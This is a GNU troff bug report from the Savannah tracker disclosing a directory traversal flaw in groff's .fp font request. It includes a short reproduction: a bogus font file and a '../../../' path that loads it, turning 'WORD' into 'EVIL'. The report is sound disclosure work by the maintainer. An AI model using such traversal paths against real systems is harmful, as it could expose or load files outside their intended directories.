URL:
<https://savannah.gnu.org/bugs/?61424>
Summary: [libgroff] directory traversal in .fp request
Project: GNU troff
Submitted by: gbranden
Submitted on: Thu 04 Nov 2021 09:09:12 AM UTC
Category: Core
Severity: 4 - Important
Item Group: None
Status: In Progress
Privacy: Public
Assigned to: gbranden
Open/Closed: Open
Discussion Lock: Any
Planned Release: None
_______________________________________________________
Details:
Affects groff 1.22.4 and probably goes back a long way.
Setup:
$ cat ~/bogusfont
charset
W 0 0 69
O 0 0 86
R 0 0 73
D 0 0 76
$ cat EXPERIMENTS/hello-dave.roff
.\" This doesn't work...
.\".fp 5 /home/branden/bogusfont
.\" ...but this does.
.fp 5 ../../../../../../../../../../../home/branden/bogusfont
.ft 5
WORD
.pl \n(nlu
Output:
$ nroff EXPERIMENTS/hello-dave.roff
EVIL
_______________________________________________________
Reply to this item at:
<https://savannah.gnu.org/bugs/?61424>
_______________________________________________
Message sent via Savannah
https://savannah.gnu.org/
